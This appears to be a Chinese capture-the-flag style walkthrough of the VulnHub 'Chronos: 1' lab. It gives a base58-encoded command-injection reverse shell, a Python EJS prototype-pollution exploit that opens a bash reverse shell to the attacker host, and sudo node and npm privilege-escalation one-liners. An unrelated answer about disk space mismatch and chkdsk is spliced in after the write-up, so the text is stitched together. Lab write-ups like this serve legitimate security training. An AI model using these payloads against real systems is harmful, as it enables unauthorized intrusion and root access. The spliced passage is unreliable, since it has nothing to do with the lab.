VulnHub日记(十八):Chronos: 1

参考链接

Vulnhub:
参考博客
GTFOBins

开始练习

本机ip:192.168.56.102
目的机ip:192.168.56.126

fping -aqg 192.168.56.0/24

在这里插入图片描述
nmap 扫描主机

nmap -A -T4 -v 192.168.56.126

在这里插入图片描述

扫描目录无果,开放22,80和8000,访问
在这里插入图片描述

在这里插入图片描述
内容相似,bp抓包,发现参数format
在这里插入图片描述
将内容进行识别,可能是base64或base58
在这里插入图片描述
两个都测试后,是base58
在这里插入图片描述
bp去除参数,查看结果比较,猜测是date命令
在这里插入图片描述
使用pwd测试,确认可以rce
在这里插入图片描述

在这里插入图片描述
拼接获取webshell

&& bash -c 'bash -i >& /dev/tcp/192.168.56.102/4396 0>&1‘

base58编码

5ZUquXDzLaQ9v2JVGCs7yoNZW1yoG6jzAs7NYSJLVTF2XfF9FH3MnsGKCnp1cqZKA9M7QmAmv3iy5x

kali开启监听端口

nc -nvlp 4396

在这里插入图片描述

在这里插入图片描述
回退,有一个该应用的第二个版本,backend文件夹里有一个express-fileupload版本有已知漏洞可以提升权限
在这里插入图片描述
在这里插入图片描述

利用脚本原文链接

##############################################################
# Run this .py to perform EJS-RCE attack
# referenced from
# https://blog.p6.is/Real-World-JS-1/
# 
# Timothy, 10 November 2020
##############################################################

### imports
import requests

### commands to run on victim machine
cmd = 'bash -c "bash -i &> /dev/tcp/192.168.56.102/4396 0>&1"'

print("Starting Attack...")
### pollute
requests.post('http://127.0.0.1:8080', files = {'__proto__.outputFunctionName': (
    None, f"x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x")})

### execute command
requests.get('http://127.0.0.1:8080')
print("Finished!")

kali开启httpserver,webshell中使用wget或curl将脚本存入靶机

kali上:  python -m SimpleHTTPServer
cd /tmp
curl http://192.168.56.102:8000/exp1.py
./exp1.py

在这里插入图片描述
在这里插入图片描述
再开启一个监听端口,执行脚本,获取用户shell
在这里插入图片描述
在这里插入图片描述

sudo -l 

在这里插入图片描述
尝试npm和node提权,node成功了

node部分

资料链接

sudo node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})'

在这里插入图片描述

npm部分

资料链接

TF=$(mktemp -d)
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
sudo npm -C $TF --unsafe-perm i

在这里插入图片描述

FLAG

在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
感谢您提供的更多细节。根据您提供的信息,磁盘D的容量不匹配可能是由于镜像文件或文件夹的大小与实际磁盘容量不一致引起的。您可以尝试以下解决方案来解决这个问题: 1. 检查文件大小:首先确认您的镜像文件或文件夹的大小是否与磁盘D的容量不匹配。您可以右键单击文件夹或文件,选择“属性”来查看其大小。如果文件夹或文件的大小与磁盘容量不相符,可能是因为存在其他隐藏文件、错误的文件路径或者磁盘损坏等原因。 2. 清理磁盘空间:如果确认文件大小与磁盘D的容量不匹配,您可以尝试清理磁盘空间以释放一些空间。您可以使用系统自带的磁盘清理工具,或者手动删除一些不需要的文件和程序来释放空间。 3. 检查磁盘错误:如果清理磁盘空间后问题仍然存在,您可以尝试检查磁盘错误。在Windows系统中,您可以打开命令提示符并以管理员身份运行命令`chkdsk D: /f /r`,其中D代表磁盘D。这个命令将扫描并修复磁盘上的错误。 4. 重新分配空间:如果以上方法都无法解决问题,您可以考虑重新分配磁盘空间。这可以通过调整磁盘分区大小或者重新分配空间来实现。请注意,在执行此操作之前,请务必备份重要数据以防止数据丢失。 请根据您的具体情况选择适合的解决方案,并确保在操作前备份重要数据。如果问题仍然存在,建议您咨询专业技术人员或操作系统厂商的支持团队,以获取更进一步的帮助和支持。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值